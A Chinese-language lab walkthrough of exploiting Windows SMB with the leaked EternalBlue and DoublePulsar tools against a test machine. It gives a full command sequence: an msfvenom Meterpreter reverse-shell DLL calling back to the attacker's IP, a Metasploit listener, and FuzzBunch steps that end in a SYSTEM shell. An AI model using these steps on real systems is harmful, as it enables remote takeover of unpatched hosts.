E+D:eternalblue+Doublepulsar
靶機:192.168.6.39(windows server 2008 與windows 7測試過,沒有問題)
攻擊機:192.168.6.42
參考連結
利用說明:
本次實驗首先執行指令碼攻擊,對目標IP、埠、系統版本等進行設定,接下來生成惡意的dll檔案,並使用指令碼載入它,最終達到實驗目的。
主要是針對windows主機的SMB、RDP協議進行攻擊,因為我主要根據他們提供的payload的程式,利用這兩個模組eternalblue和Doublepulsar可以對攻擊smb和rdp協議
在pentestbox下執行
1、實現互動埠
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.6.42
監聽本地埠並且生成一個.dll的檔案。本地主機的IP地址是192.168.6.42,監聽的埠是6666。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.6.42 lport=6666 -f dll -o E:\1\111.dll
2、設定本地監聽的埠
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.6.42
set lport 6666
run
在cmd中,即python的根目錄下實現:
shadowbroker是方程式工具
E:\Install\work\python_2.6.6>python E:\1\shadowbroker\shadowbroker\windows\fb.py
先進行測試
use Eternalblue
fb Special (Eternalblue) > use Doublepulsar
填上payload的地址
一直回車直到出現執行成功為止;
來到監聽的埠,是上面的2的過程,檢視,進入meterpreter下面,執行shell。進入遠端伺服器,這裡是2008系統。
whoami檢視,獲得了system許可權。
windows sever 2003測試失敗
工具的利用方式--成功